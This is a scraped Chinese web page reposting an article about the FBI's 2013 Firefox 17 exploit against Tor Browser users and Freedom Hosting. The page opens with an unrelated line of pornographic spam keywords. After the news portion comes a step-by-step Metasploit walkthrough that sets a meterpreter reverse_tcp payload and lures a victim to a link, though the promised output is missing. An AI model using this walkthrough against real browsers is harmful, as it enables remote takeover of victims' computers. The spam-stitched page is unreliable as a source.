日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
FBI追蹤Tor用戶使用的Firefox漏洞利用程序

Tor網(wǎng)絡(luò)是一種允許用戶匿名訪問網(wǎng)站和其他服務(wù)的網(wǎng)絡(luò)。在這個網(wǎng)絡(luò)中,存在一種稱為黑暗網(wǎng)絡(luò)(darknet)的服務(wù),從論壇到電子郵件都有,這些服務(wù)是只有通過tor才可以訪問。

Tor通過志愿者提供的3000多個中繼傳輸網(wǎng)絡(luò)流量從而隱藏真實(shí)用戶的位置信息。盡管Tor網(wǎng)絡(luò)上的很多服務(wù)都是清白的,但是它的匿名性也吸引了很多具有犯罪意圖的人,比如傳播兒童色情的組織。

出生于美國的Eric Eoin Marques居住在愛爾蘭的都柏林,他是Freedom Hosting的首席架構(gòu)師,而Freedom Hosting在歐洲的550臺服務(wù)器被指控用來托管兒童色情網(wǎng)站。

Freedom Hosting就是Tor網(wǎng)絡(luò)上的一個重要的服務(wù)提供商。它的服務(wù)只能通過tor網(wǎng)絡(luò)來訪問。因?yàn)樗嫦舆`法的事情,所以Tor的負(fù)責(zé)人還特地發(fā)表過聲明,稱他們跟運(yùn)營Freedom Hosting的人沒有任何關(guān)系。聲明如下:

“運(yùn)營Freedom Hosting的人或組織跟開發(fā)Tor軟件的團(tuán)隊(duì)沒有任何關(guān)聯(lián)和隸屬關(guān)系。過去,曾有敵對的組織試圖繞過tor隱藏的服務(wù),直接攻擊tor網(wǎng)絡(luò)背后服務(wù)器上的軟件。通常都是利用php,mysql和其他的軟件的漏洞而不是tor本身的漏洞。最近有消息表明,有人成功利用了Freedom Hosting背后的軟件漏洞。據(jù)我們所知是利用了Firefox 17 ESR的一個bug,tor瀏覽器就是基于這個firefox版本的。我們會研究這些bug,并盡快修復(fù)他們。

FBI利用了firefox17的一個漏洞,成功追蹤到了Freedom Hosting的服務(wù)器。它使用的payload是收集電腦的MAC地址和hostname,然后通過http協(xié)議發(fā)送到自己控制的服務(wù)器上從而獲得真實(shí)的ip地址。

Mozilla Firefox 小于22.0的版本,F(xiàn)irefox ESR 17.x,小于17.07的版本,Thunderbird ESR 17.x,小于17.07的版本沒有妥善的處理onreadystatechange事件,導(dǎo)致遠(yuǎn)程攻擊者可以拒絕服務(wù)攻擊(程序crash)或者可能執(zhí)行任意代碼。

2013年8月份的時候就已經(jīng)有人在利用這個漏洞攻擊Tor browser的用戶了?,F(xiàn)在msf上已經(jīng)有利用模塊,針對firefox17.06.模塊使用說明:

windows/browser/mozilla_firefox_onreadystatechange:

輸入show options檢查這個exp的配置項(xiàng)

SRVHOST是msf本機(jī)的地址,這里配置命令是set SRVHOST 192.168.0.3

然后設(shè)置payloadset PAYLOAD windows/meterpreter/reverse_tcp

輸入show options查看payload的配置項(xiàng)

設(shè)置接受反彈shell的地址 set LHOST 192.168.0.103

輸入run命令開始監(jiān)聽:

只要讓受害者訪問這個exp生成的鏈接就可以了.這里是http://192.168.0.103:8080/2Hek0bdO

如果對方的瀏覽器存在漏洞可以看到msf的輸出如下:

參考資料:

http://rt.com/usa/fbi-exploiting-tor-child-porn-842/

http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/

http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html

http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange

via http://resources.infosecinstitute.com 翻譯整理by litdg@freebuf


分享文章:FBI追蹤Tor用戶使用的Firefox漏洞利用程序
本文來源:http://m.5511xx.com/article/coidcip.html